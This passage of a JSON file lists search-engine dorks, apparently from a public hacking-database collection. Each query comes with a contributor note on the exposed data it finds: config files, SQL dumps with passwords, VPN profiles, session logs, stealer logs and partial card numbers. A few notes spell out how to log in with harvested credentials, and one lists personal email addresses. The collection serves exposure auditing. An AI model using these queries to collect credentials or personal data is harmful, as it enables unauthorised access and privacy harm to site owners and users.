recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. When addressed to our clients any opinions or advice contained in this email are subject to the terms and conditions expressed in the governing KPMG client engagement letter.\n***********************************************************************"}, {"dork": "runtimevar softwareVersion=", "description": "Hits: 807\nConfig file from Thomson home routers, sometimes it contains password's and\nuser's encrypted\nContains ACS servers info from ISP's"}, {"dork": "ext:gnucash", "description": "*Google Search:*\nhttp://www.google.com/search?q=ext:gnucash\n*Description:*\nFind Gnucash Databases containing juicy info.\n*Author:*\nhttp://la.usch.io\nhttps://www.twitter.com/la_usch\n--------------------------------------------------------\nCheers\nL@usch\nWeb: http://la.usch.io\nTwitter: https://www.twitter.com/la_usch"}, {"dork": "filetype:ini \"This is the default settings file for new PHP installations\"", "description": "Finds PHP configuration files (php.ini) that have been placed in indexed\nfolders. Php.ini defines a PHP installation's behavior, including magic\nquotes, register globals, and remote file operations. This can be useful\nfor knowing which attacks (such as RFI) are possible against the server.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:php -site:php.net intitle:phpinfo \"published by the PHP Group\"", "description": "Tries to reduce false positive results from similar dorks. Finds pages\ncontaining output from phpinfo(). This function is used to debug and test\nPHP installations by listing versions, extensions, configurations, server\ninformation, file system information, and execution environment. The output\nof this function should not be included in production environments and\ncertain versions of this function are vulnerable to reflected XSS attacks.\n- Andy G - twitter.com/vxhex"}, {"dork": "allintext: /iissamples/default/", "description": "Searching for \"allintext: /iissamples/default/\" may provide interesting\ninformation about a mis-configured .asp server including raw source code\nfor asp, directory structure and the IIS version ( especially useful when\nIIS is running on NT 4.0)\nthe result provides a way to further explore directory structure for juicy\ninfo.\nOleg."}, {"dork": "inurl:\"zendesk.com/attachments/token\" site:zendesk.com", "description": "zendesk is good ticketing system . It has thousands of clients. with the\nabove dork you can see the clients internal file attachments of the\ntickets .\nThese file can be opened by anyone because they are not maintaining any\nauthentication token for this attachments\nInternal source codes, doubts, ip's , passwords, can be disclosed in the\nattachments"}, {"dork": "inurl:fluidgalleries/dat/login.dat", "description": "Works with every single fluidgalleries portofolio sites. Just decrypt the MD5 hash and login onto url.extension/admin.php with the username from the search result and with the decrypted MD5 hash. Dork by Kraze (kraze@programmer.net)"}, {"dork": "inurl:wp-content/uploads/dump.sql", "description": "This is *Mohan Pendyala* (penetration tester) from india.\nGoogle Dork: *inurl:wp-content/uploads/dump.sql*\n*\n*\nThe *Dump.sql* file reveals total info about the database tables, Users,\npasswords..etc"}, {"dork": "intitle:\"WAMPSERVER Homepage\" & intext:\"Server Configuration\"", "description": "#Summary: Wampserver Homepage free access (*http://www.wampserver.com/).*\n#Author: g00gl3 5c0u7"}, {"dork": "inurl:~~joomla3.txt filetype:txt", "description": "By this dork you can find juicy information joomla configuration files\nAuthor: Un0wn_X"}, {"dork": "filetype:txt inurl:wp-config.txt", "description": "Easily hunt the Wordpress configuration file in of remote web sites\nAuthor : Un0wn_X"}, {"dork": "filetype:txt inurl:~~Wordpress2.txt", "description": "This dork can be used to find symlinked Wordpress configuration files of\nother web sites"}, {"dork": "inurl:github.com intext:sftp-conf.json +intext:/wp-content/", "description": "Find FTP logins and full path disclosures pushed to github\ninurl:github.com intext:sftp-conf.json +intext:/wp-content/\n--\nRogueCoder"}, {"dork": "filetype:php intext:\"PROJECT HONEY POT ADDRESS DISTRIBUTION SCRIPT\"", "description": "Project Honey Pot anti-spammer detection (http://www.projecthoneypot.org/)\nCan identify the honeypot and get the site's honeypot keys\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:config \"fetch = +refs/heads/*:refs/remotes/origin/*\"", "description": "Git config file\nEasy way to find Git Repositories\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:/wp-content/uploads/ filetype:sql", "description": "Google dork for WordPress database backup file (sql):\ninurl:/wp-content/uploads/ filetype:sql\nBy sm0k3 (http://sm0k3.net - Sm0k3 HQ)\n_________________\nWith regards,\nsm0k3\nAny questions: info@sm0k3.net\nAdministration issues: admin@sm0k3.net\nWant to submit an order: submit@sm0k3.net\nJabber: sm0k3@im.sm0k3.net\nBlog: http://sm0k3.net"}, {"dork": "filetype:bak (inurl:php | inurl:asp | inurl:rb)", "description": "This one could be used to find all sorts of backup data, but this example\nis limited to just common webapp extensions\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:tar filetype:gz", "description": "Tar files\nContain user and group information (in addition to potentially useful files)\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:\"jmx-console/HtmlAdaptor\" intitle:Mbean", "description": "JBoss\nhttp://docs.jboss.org/jbossas/docs/Server_Configuration_Guide/4/html/Connecting_to_the_JMX_Server-Inspecting_the_Server___the_JMX_Console_Web_Application.html\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "filetype:xml inurl:sitemap", "description": "Sitemaps, the opposite of Web Robots Exclusion\nDetail directory and page map\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:mikrotik filetype:backup", "description": "mikrotik url backups uploaded..\nthen.. credentials cracked via http://mikrotikpasswordrecovery.com\nBest Regards,\nkn0wl13dg3 - underc0de team.- www.underc0de.org\nkn0w13dg3.blogspot.com"}, {"dork": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github", "description": "intext:phpMyAdmin SQL Dump filetype:sql intext:INSERT INTO `admin` (`id`, `user`, `password`) VALUES -github\nHow This Work?\nThis dork will searches databases phpMyAdmin. Searches only sql formats and founds admin username and passwords to use this information to login as administrator\nSorry for my english. I'm not a native speaker"}, {"dork": "inurl:crossdomain filetype:xml intext:allow-access-from", "description": "Locates crossdomain.xml files used by flash/flex/silverlight to\ndetermine the cross domain policy of that site's\nflash/flex/silverlight apps. An open setting of will allow a weaponized flash application hosted on an\nattacker's site to read information from the target site while running\nin a victim's browser.\n-- \nGoogle+ http://google.com/+EricGragsone\nRed Team http://www.crimsonagents.com/\nBlue Team http://www.erisresearch.org/\nCoding http://maetrics.github.io"}, {"dork": "inurl:clientaccesspolicy filetype:xml intext:allow-from", "description": "Locates clientaccesspolicy.xml files used by silverlight to determine\nthe cross domain policy of that site's silverlight apps. An open\nsetting of will allow a weaponized silverlight\napplication hosted on an attacker's site to read information from the\ntarget site while running in a victim's browser.\n-- \nGoogle+ http://google.com/+EricGragsone\nRed Team http://www.crimsonagents.com/\nBlue Team http://www.erisresearch.org/\nCoding http://maetrics.github.io"}, {"dork": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "description": "Files with information DMZ, public IP, private IP network segments, etc.\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "filetype:sql site:com and \"insert into\" admin \"2014\"", "description": "filetype:sql site:com and \"insert into\" admin \"2014\""}, {"dork": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "description": "Looks for text files with SHA1 of \"password\". These could be tips (not very useful), config files, other peoples wordlist dumps, etc"}, {"dork": "filetype:log intext:org.apache.hadoop.hdfs", "description": "Dork : filetype:log intext:org.apache.hadoop.hdfs\nList of Log files which contain details about internal and External ip in\nHadoop Grid\n.This Log Files generated after every batch process.\n-- \nSimmant Yadav"}, {"dork": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "description": "Files found with this google dork will show juicy information about a\nmigration of a complete wordpress site, including the location of a .zip\nfile where the complete site is stored including \"wp-config.php\",\n\".htaccess\" and other interesting private files.\nThis file is the result of a migration with the Wordpress plugin\n\"Duplicator\".\nAuthor: @felmoltor"}, {"dork": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "description": "Search Apache server information though default module info_module:\ninurl:\"/server-info\" intext:\"Loaded Modules\"\nAuthor: @felmoltor\n-- \nFelipe Molina de la Torre"}, {"dork": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "description": "Hi,\nThis google dork to find sensitive and interesting information under\nWEB-INF directory via ftp protocol, for example:\n* Website map\n* Sensitive information (user name and password for webdave)\n* Deployment descriptor in java (web.xml)\n* Servlet mapping url pattern\nKeyword:\nfiletype:xml inurl:/WEB-INF/ inurl:ftp:// -www\n-- \nFahad Altamimi"}, {"dork": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "description": "Google dork to find session IDs and potentially impersonate users:\nintext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log\nRegards,\nGabor Szathmari"}, {"dork": "intitle:\"index of\" \"archive.pst\" -contrib", "description": "Google Dork: intitle:\"index of\" \"archive.pst\" -contrib\nAuthor: Sphearis\nThis dork allows you to see Outlook archive files stored in the open. These\nfiles can be opened with a simple .pst viewer to read all emails it\ncontains.\nThe \"-contrib\" has been added to filter Cran installations which uses a\ndirectory structure similar to the search terms."}, {"dork": "inurl:/dbg-wizard.php", "description": "# Exploit Title: Nusphere PHP DBG wizard\n# Date: 02-06-2015\n# Vendor Homepage: http://www.nusphere.com\n# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm\n# Version: any\n# Exploit Author: Alfred Armstrong\n# Contact: http://twitter.com/alfaguru\n# Website: http://figure-w.co.uk\nDBG Wizard is meant to be used with the DBG PHP debugger as an aid to\nconfiguring it correctly. It is supplied as a PHP script called\ndbg-wizard.php which when placed in the root folder of a web site and\nexecuted provides instructions to the user about setting up their web\nserver so the debugger can be used.\nIt is not meant to be present on a live site as it exposes details\nabout software configurations and versions which might allow an\nattacker to discover other vulnerabilities. If the DBG shared library\nis also installed it will expose that fact and potentially assist an\nattacker in crafting a request to start a debug session in which they\ncould do anything that can be done through a PHP script, including\nreading files and accessing database entries.\n--\nAlfred Armstrong"}, {"dork": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "description": "This Dork reveal the folders of \"Inbox\" and \"Sent\" for mail servers. Enjoy."}, {"dork": "filetype:pcf vpn OR Group", "description": "Google Dork: filetype:pcf vpn OR Group\nAuthor: azupwn\nThis dork allows you to search for publicly accessible profile\nconfiguration files (.pcf) used by VPN clients. These files typically\ncontain usernames, password, tunneling ports, VPN server information and\nother information.\nCheers,\n-- \nazupwn"}, {"dork": "intitle:\"index of\" \"fic\" \"ndx\"", "description": "# Exploit Title: intitle:\"index of\" \"fic\" \"ndx\"\n# Google Dork: intitle:\"index of\" \"fic\" \"ndx\"\n# Date: 10/06/2015\n# Exploit Author: Sphearis\nThis dork allows you to look for Hyperfile databases(.FIC) stored in the\nopen. You can simply read them in a text editor(You'll see the header and\nthen the database content in plain text) or you can convert them(to xml,\nexcel, ...) with free software. In order to convert them, you also need the\nlinked index file (.NDX) and optional mmo file which are located in the\nsame directory.\nSome Windev/Webdev installations store usernames and other sensitive\ninformation in that kind of file."}, {"dork": "\"signons.sqlite\" intitle:\"index of\"", "description": "\"signons.sqlite\" intitle:\"index of\"\nThis dork finds firefox profiles and other softwares that use the similar\nformat that you can grab and put in your own firefox or other installation\nand reveal all passwords saved, history, bookmarks, saved cookies and\npretty much everything! When you get hacked using this method it feels like\nyou are getting hacked by a whole team.\nby _sNapper\n-- \n\"The answer to every problem is One.\" -- Myself\n--\n\"Life is like war, for the most part--planning it is useless.\" -- Myself"}, {"dork": "phpMyAdmin SQL Dump", "description": "# Exploit Title: [phpMyAdmin SQL Dump]\n# Google Dork: [intext:SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\"; = ext:txt]\n# Date: [6/29/2015]\n# Exploit Author: [Daz Holmes]"}, {"dork": "inurl:access.cnf ext:cnf", "description": "File vulnerability, reveals the path of Password Server. Have fun.\nThis Dork is present By Rootkit."}, {"dork": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "description": "Google dork Description: MySQL dumpGoogle search: intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt\nby TN-N3SQU1K :)"}, {"dork": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "description": "The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the\n'wp-config.php' file. It contains information about the database,\nincluding the name, host (typically localhost), username, and password.\nThis information allows WordPress to communicate with the database to store\nand retrieve data (e.g. Posts, Users, Settings, etc).\nName: Suyog Pawar."}, {"dork": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "description": "Files containing Juicy information from web online tools for generating .htpasswd and giving full web path .\nby - l1kw1d"}, {"dork": "intext:/homedir/.cpanel-datastore/", "description": "intext:/homedir/.cpanel-datastore dork displays publicly accessible and\nindexed cpanel datastores.\nEnjoy, Zapperlink"}, {"dork": "filetype:pac inurl:\"/proxy\"", "description": "Search the Web Proxy Autodiscovery Protocol\nIng. Daniel Maldonadohttp://www.caceriadespammers.com.ar"}, {"dork": "inurl: mil|/issue.php filetype:xls", "description": "Files containing juicy info of the involved current issuers\nAuthor : aye_robot"}, {"dork": "inurl:xampp inurl:perlinfo.pl ext:pl", "description": "Panels with a lot of data for webservers.\nDork by Rootkit Pentester."}, {"dork": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "description": "Dork :\nsite:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup\nThis Will help to grab the Backup and old file of the (.gov and .edu)\nWebsite's\nBy : Mishra Dhiraj (D)"}, {"dork": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "description": "Dork;\nsite:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini\nThis dork will search for any configuration files a target or targets may\nhave.\nYou can change in site:target.com - to target:edu (for education targets)\nBy Kevin Mark"}, {"dork": "site:ws.kik.com | site:ws2.kik.com k=", "description": "Google Dork: site:ws.kik.com | site:ws2.kik.com k=\nDate: September 16th, 2015\nExploit Author: Matthew Blankenship\nDescription: Shows usernames, emails, and verification tokens for kik messenger accounts."}, {"dork": "inurl:\"trace\" ext:axd intext:\"password\"", "description": "the dork keyword is:\ninurl:\"trace\" ext:axd intext:\"password\"\npurpose of dork:\nsearch for tracing files in the ASP.NET websites which might contain a\nsensitive information such as the username and password entered to the\napplication.\ndiscovered by: Asem Al Husaini (SFDA)"}, {"dork": "inurl:\"server-status\" intext:\"Apache Server Status\"", "description": "Files containing juicy info\nThe Status module allows a server administrator to find out how well\ntheir server is performing. A HTML page is presented that gives the\ncurrent server statistics in an easily readable form. If required this\npage can be made to automatically refresh (given a compatible\nbrowser). Another page gives a simple machine-readable list of the\ncurrent server state.\nThe details given are:\nThe number of worker serving requests\nThe number of idle worker\nThe status of each worker, the number of requests that worker has\nperformed and the total number of bytes served by the worker (*)\nA total number of accesses and byte count served (*)\nThe time the server was started/restarted and the time it has been running for\nAverages giving the number of requests per second, the number of bytes\nserved per second and the average number of bytes per request (*)\nThe current percentage CPU used by each worker and in total by Apache (*)\nThe current hosts and requests being processed (*)\n-- \nAshish Kumar Sahu"}, {"dork": "\"Stats generated by pisg v0.73\"", "description": "Dork with Stats for irc channels.\nDiscovered by Rootkit Pentester."}, {"dork": "intext:\"Microsoft(R) Server Maintenance Utility (Unicode)\" ext:txt", "description": "Details:\nSearch result shows Txt files. Text files contains database information+server path disclosure+different db queries. \n(\u00af`\u00b7._.\u00b7[ Silent_Z3R0 ]\u00b7._.\u00b7\u00b4\u00af)(\u00af`\u00b7._.\u00b7[ Pak Cyber Army ]\u00b7._.\u00b7\u00b4\u00af)"}, {"dork": "intitle:\"TurnKey LAMP\" intext:\"turnkey lamp release notes\" \"Apache PHP information\"", "description": "Detail:\n Google results shows turnkey lamp default page which discloses information server like PHPINFO page, Apache server Status, webmin login page and many more.\n[ Silent Z3R0 ]-[Pakistan Cyber Army]"}, {"dork": "inurl:\"sugarcrm.log\" ext:log -git -google", "description": "Description: SugarCRM log files\nGoogle search: inurl:\"sugarcrm.log\" ext:log -git -google\nAuthor: nebo_oben"}, {"dork": "filetype:rcf inurl:vpn", "description": "Sonicwall Global VPN Client files containing sensitive information and login"}, {"dork": "intitle:\"Skipfish . scan\"", "description": "Google Dork: intitle:\"Skipfish . scan\"\nURL: http://www.google.com/search?q=intitle:%22Skipfish+.+scan%22\nDescription: Skipfish Vulnerability Scan Report\nAuthor: Andrea (aka theMiddle) Menin\n-theMiddle"}, {"dork": "filetype:pdf intitle:\"SSL Report\"", "description": "These dork show Qualys SSL Reports Hosts.\nEnjoy with them.\nRegards.\nRootkit Pentester."}, {"dork": "site:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"", "description": "Slack auth tokens used by \"chatops\" bot developers mistakenly disclosed on github.com:\nsite:github.com filetype:md | filetype:js | filetype:txt \"xoxp-\"\n-- \nNicholas Hinsch"}, {"dork": "index of /wp-content/uploads/userpro", "description": "Alot of juicy info found, some csv files found that had alot of personal\ninformation.\nSometimes if you type ConversationUnread you can get the same results.\nstag_1"}, {"dork": "intext:\"/LM/W3SVC/\" ext:asp", "description": "intext:\"/LM/W3SVC/\" ext:asp\nServerVariables that give information.\n-Xploit"}, {"dork": "intext:\"/showme.asp\" HTTP_ACCEPT", "description": "intext:\"/showme.asp\" HTTP_ACCEPT\nApplication & Session Contents for Servers.\n-Xploit"}, {"dork": "filetype:sql intext:wp_users phpmyadmin", "description": "# Exploit Title: (Google Dork) filetype:sql intext:wp_users phpmyadmin\n# Google Dork: filetype:sql intext:wp_users phpmyadmin\n# Date: 2016-07-06\n# Exploit Author: RuBiQc\nDescription: Finds SQL dump files of Wordpress sites with usernames and \npasswords. Pretty funny that people make these publicly available!"}, {"dork": "inurl:DiGIR.php", "description": "# Exploit Title: (Google Dork) inurl:DiGIR.php\n# Google Dork: inurl:DiGIR.php\n# Date: 7-7-2016\n# Exploit Author: fnkym0nky\nDescription: Finds files that contain diagnostic issues for SQL databases,\nPHP code, among other things. Able to be used in tandem with Error Based\nSQLi, and vulnerability enumeration"}, {"dork": "inurl:wp-content/debug.log", "description": "According to the Wordpress docs at\nhttps://codex.wordpress.org/Debugging_in_WordPress the option exists\nto enable a debug log for a number of actions in Wordpress. In true\nWordpress style, this file is dropped into a web-readable directly,\nwith no consideration for who may be able to read the file.\nBeing a debug log, as you would expect this file can include full SQL\nqueries, full file paths, usernames, passwords and all other other\ndetail you'd expect in a debug log!\nOf course, Google has picked up a number of these files, and I'm sure\nthere are many more just a quick scan away probably only protected by\nrobots.txt files.\nGHDB Entry: https://google.com/search?q=inurl:wp-content/debug.log\nJames"}, {"dork": "inurl:log -intext:log ext:log inurl:wp-", "description": "All kinds of juicy log information that can be picked up on wordpress sites\nranging from php_errors.log to WS_FTP.log and more. Use inurl:edu or\ninurl:gov etc. at the end to specify by which domains you want to filter\ndown and view information about.\nAyushman Dutta\nUniversity of Houston"}, {"dork": "(@gmail.com || @yahoo.com || @hotmail.com) ext:php inurl:compose", "description": "Names of mail accounts and other data of webmail servers.\nEnjoy Healthy.\nDork by Rootkit Pentester."}, {"dork": "inurl:calendar.google.com/calendar/embed?src=", "description": "This will bring up publicly available Google Calendars. For example, using\nthis dork you can find:\n - https://calendar.google.com/calendar/embed?src=safekprocess@gmail.com\n - https://calendar.google.com/calendar/embed?src=chris.hm.chan@gmail.com\n - https://calendar.google.com/calendar/embed?src=kchan9@gmail.com"}, {"dork": "\"[HKEY_CURRENT_USER\\Software\\sota\\FFFTP]\" filetype:reg", "description": "This finds some files with juicy information about Windows servers.\nDork: \"[HKEY_CURRENT_USER\\Software\\sota\\FFFTP]\" filetype:reg\n-Gee"}, {"dork": "\"PHP Version\" inurl:/php/phpinfo.php", "description": "This finds pages containing info about the PHP installation and is useful for reconnaissance.\nDork: \"PHP Version\" inurl:/php/phpinfo.php\n-Gee"}, {"dork": "https://paper.dropbox.com inurl:/doc/", "description": "site:https://notes.dropbox.com inurl:/hp/\nA google dork for Dropbox Paper that will allow us to access\ndocuments of other users and see their email address that they use on\nDropbox.\nhttps://secuna.ph\nhttps://medium.com/@atom\nAllan Jay Dumanhug"}, {"dork": "inurl:ManageFilters.jspa?filterView=popular", "description": "*Summary:*\nA Google dork that gives popular JIRA issue topics, related JIRA usernames\nand JIRA queries.\n*Dork discovered by:*\nCenk Kalpakoglu\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "inurl:\"/debug/default\" intitle:\"Yii Debugger\"", "description": "Yii Debugger PHP Framework Server Information.\nAlso other dorks.\ninurl:\"/debug/default/view?panel=\"\ninurl:\"/debug/default/view?\"\n-Xploit"}, {"dork": "allinurl: drive.google.com/open?id=", "description": "Hi!, i discovered this exploit that gets some juicy documents and data from\nusers shared google drive.\nDon't know if it's already uploaded but of course, the exploit is still\nworking of course,\nCheers.\nNiko Onek"}, {"dork": "inurl:iProber2.php ext:php", "description": "Category:Files Containing Juicy Info\nExploit Author:Amine Sanchez"}, {"dork": "inurl:/o/oauth2 inurl:client_id", "description": "Searching for this will return various Client ID\u2019s used with the authentication process within the OAuth2 protocol.\n- therealjayvi"}, {"dork": "intitle:\"FormAssembly Enterprise :\"", "description": "FormAssembly installation finder. Contains forms organizations use to\ncollect information. Some sensitive. Some random. Enjoy.\nDork Keyword: intitle:\"FormAssembly Enterprise :\"\nVendor Homepage: https://www.formassembly.com/enterprise/\nCategory: Files Containing Juicy Info\n------------ Discovered By: Matt - @novpn --------------"}, {"dork": "httrack inurl:hts-log.txt ext:txt -github.com", "description": "Dork for data of httrack web site copy logs.\nEnjoy.\nDork by Rootkit Pentester."}, {"dork": "filetype:pcmcfg", "description": "Google Dork: filetype:pcmcfg\nAuthor: Tarkan Catal X\nThis dork allows you to search for installation template file used by pulseway application (.pcmcfg). This file contains usernames, passwords (encrypted) and server information.\nPulseway is an remote monitoring and management software www.pulseway.com"}, {"dork": "inurl:\"/attachment/\" ext:log", "description": "Finds web application logs that have LOTS of info ;)\nDxtroyer"}, {"dork": "inurl:\"/phpinfo.php\" \"PHP Version\"", "description": "Finds phpinfo() pages that give you lots of handy info!\nDxtroyer"}, {"dork": "\"PGP SIGNED MESSAGE-----\" inurl:\"md5sums\"", "description": "FInds sums (MD5, SHA1, etc) that people don't want you to see!\nDxtroyer"}, {"dork": "intext:Table structure for table `wp_users` filetype:sql", "description": "Google dork : intext:Table structure for table `wp_users` filetype:sql\nDescription : This google dork can access many website database dump in sql format .\nThis google dork created by SIVABALAN ( DEKINGOFCYBER )"}, {"dork": "\"havij report\" \"Target\" ext:html", "description": "Dork who show the havij sqli injection reports.\nDork by Rootkit Pentester."}, {"dork": "inurl:\"mail\" ext:mai", "description": "Finds private (so to speak) emails sent from servers\nDxtroyer"}, {"dork": "\"LGD_CARDNUM\" ext:log -site:camper.com", "description": "Find partial credit card numbers, bank account info, and more!\nDxtroyer"}, {"dork": "\"[PHPSESSID]\" ext:log", "description": "Looks for logs with session ID's generated by PHP\nDxtroyer"}, {"dork": "\"/wp-admin/admin-ajax\" ext:txt", "description": "Finds robots.txt files, which provide info about the server's more\nsensitive side (Which can't be found with Google)\nDxtroyer"}, {"dork": "\"Scan result of Farbar Recovery Scan Tool\" ext:txt", "description": "Finds logfiles for... Farbar?!? I don't even know. Some cool info, though.\nDxtroyer"}, {"dork": "inurl:\"Makefile.in\" ext:in", "description": "Finds config files with private server information\nDxtroyer"}, {"dork": "inurl:\"/Windows/Cookies/\" ext:txt -git", "description": "Cookies from ALL KINDS of sites. Yum! (Think there's only 3 pages of\nresults? think again!)\nDxtroyer"}, {"dork": "\"screen mode id:\" ext:rdp", "description": "RDP is basically a Windows-sanctioned backdoor. You can use it to access\nsomeones computer remotely. This dork finds files with RDP info and logins!\nDxtroyer"}, {"dork": "inurl:\"/data/urllist.txt\" ext:txt -git", "description": "Finds plaintext sitemaps, containing pages which robots.txt disallows\nDxtroyer"}, {"dork": "\"-- MySQL dump\" ext:sql -git", "description": "Finds MySQL database dumps, sometimes containing usernames, passwords, and\nmore!\nDxtroyer"}, {"dork": "inurl:core.windows.net ext:xlsx", "description": "Google Dork for Azure Blob Container files publically available.\nObviously you can change the file extension or run without the extension howver it yields more precise results :)\nAl"}, {"dork": "\"Operating System Intel Recovery\" ext:txt", "description": "Description: Various stealers logs\nDork: \"Operating System Intel Recovery\" ext:txt\nAuthor: scumsec"}, {"dork": "\"WEB Browser Password Recovery\" ext:txt", "description": "Description: Various stealers logs\nDork: \"WEB Browser Password Recovery\" ext:txt\nAuthor: scumsec"}, {"dork": "\"MiniToolBox by Farbar\" ext:txt", "description": "Finds logs with IP configuration, DNS info, application errors, and more!\nDxtroyer"}, {"dork": "inurl:\"wp-security-audit-log\" ext:log", "description": "Finds Wordpress audit logs containing some interesting info about previous\r\nattempts to audit the site\r\n\r\nDxtroyer"}, {"dork": "inurl:wp-links-opml.php", "description": "A Google dork that gives the information about wordpress opml version\r\n\r\n*Dork discovered by:*\r\nm0be1"}, {"dork": "inurl:\"/horde/test.php\"", "description": "Exploit Title:horde php information disclosure\r\n\r\nGoogle Dork:inurl:\"/horde/test.php\"\r\n\r\ndate:11/14/2017\r\n\r\nExploit Author:Cameron Maerz\r\n\r\nVendor Homepage: https://www.horde.org"}, {"dork": "\"-- Dumping data for table\" ext:sql", "description": "This dork will return database backups.\r\n\r\nBy: A1anoud Altoraif."}, {"dork": "intext:\"softperms.txt\" ext:TXT", "description": "When you dork with this,it will generate juicy information that may lead to\r\nparent directory , for best practice filter according to the country .\r\n\r\n\r\nRegards\r\n\r\nFu2x2000"}, {"dork": "inurl:composer.json filetype:json -site:github.com", "description": "To find out the php packages and their versions used within a website using\r\nthe composer dependency manager config file, composer.json\r\n\r\nThanks\r\nVishnu Santhosh"}, {"dork": "intext:Server.MapPath(\".mdb\") ext:asp", "description": "Dork: intext:Server.MapPath(\".mdb\") ext:asp\r\nAbove Dork will show source code of asp file which contain path to local database. Most of these databases contain Admin/User credentials. \r\n\r\nThanks\r\nAamir Rehman"}, {"dork": "intext:\"Set objConn=Server.CreateObject(\"ADODB.Connection\")\" ext:asp", "description": "intext:\"Set objConn=Server.CreateObject(\"ADODB.Connection\")\" ext:asp\r\n\r\n\r\nAbove Dork will show source code of asp file, Most of them contains path to local database.\r\n\r\nThanks\r\nAamir Rehman"}, {"dork": "\"Do not distribute\" (ext:pdf | ext:doc | ext:docx | ext:rtf)", "description": "Finds confidential documents with the \"DO NOT DISTRIBUTE\" tag\r\n\r\nDxtroyer"}, {"dork": "\"Start of NVIDIA bug report log file\" ext:log", "description": "Finds NVIDIA bug reports, containing juicy info about the computer,\r\nincluding settings\r\n\r\nDxtroyer"}, {"dork": "\"OTL Extras logfile created on:\" ext:txt", "description": "Finds OTL Extras scan logs, containing valuable info about the host\r\n\r\nDxtroyer"}, {"dork": "intext:----- Begin SAP License ----- ext:txt", "description": "hope it's hellpful to find sap license files :)\r\n\r\ndork: intext:----- Begin SAP License ----- ext:txt"}, {"dork": "ext:pdf intext:\"Category: Password Management: Hardcoded Password\" intext:\"Issues)\"", "description": "Google Dork: Files Containing Juicy Info\r\nFinds Fortify scan reports which contains source code vulnerabilities.\r\n\r\nHuijun Chen"}, {"dork": "intitle:\"Chorus 2 - Kodi web interface\"", "description": "Shout out to TorrentFreak (https://torrentfreak.com/is-your-kodi-setup-being-spied-on-180101/)\r\n\r\nintitle:\"Chorus 2 - Kodi web interface\""}, {"dork": "intitle:Kodi inurl:\":8080\" \"Music. Music;\"", "description": "Shout out to TorrentFreak (https://torrentfreak.com/is-your-kodi-setup-being-spied-on-180101/)\r\n\r\nintitle:Kodi inurl:\":8080\" \"Music. Music;\""}, {"dork": "intitle:\"rutorrent v3\" AND intext:Uploaded -github.com", "description": "intitle:\"rutorrent v3\" AND intext:Uploaded -github.com\r\n\r\n\r\n- - - \r\n\r\n## Other Work\r\n\r\n- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/\r\n- Deluge v1 ~ https://www.exploit-db.com/ghdb/4741/\r\n- Deluge v2 ~ https://www.exploit-db.com/ghdb/4742/"}, {"dork": "inurl:\"test/php/test.html\" Plesk File", "description": "Description: This dork finds phpinfo file with Juicy Information about\r\nPlesk systems."}, {"dork": "\"SiteBar Bookmark Manager\" inurl:index.php?w=", "description": "Dashboards of SiteBar.\r\nEnjoy healthy!!!.\r\nDork by Rookit_Pentester."}, {"dork": "intitle:\"PHP Web Stat - Sysinfo\" intext:php inurl:stat/sysinfo.php", "description": "This dork list all server statistics , hardware details and installed\r\nsoftware details because of exposed phpsysinfo script"}, {"dork": "\"Email delivery powered by Google\" ext:pdf OR ext:txt", "description": "Dork for use to read mails of subscribtions and other juice data.\r\n\r\nDork for Rootkit_Pentester.\r\nRegards."}, {"dork": "intitle:index.of intext:zc_install intitle:zen-cart", "description": "Dork: *intitle:index.of intext:zc_install intitle:zen-c*art\r\n\r\nSummary:\r\n\r\nA Google dork that gives the information about target database and source\r\ncode. *Dork discovered by:* Sachin Wagh (@tiger_tigerboy)"}, {"dork": "inurl:module=coreHome", "description": "Piwik web analytics shows statistics for web servers including who is\r\nvisiting the site, what pages they visit, number of hits, referrers, and\r\nmore.\r\n\r\n-batgab"}, {"dork": "inurl:\"main.php?action=db\"", "description": "This dork will find installations of MySQLDumper (http://www.mysqldumper.de/)\r\nwhich by default are unprotected. This allows full databse acces. 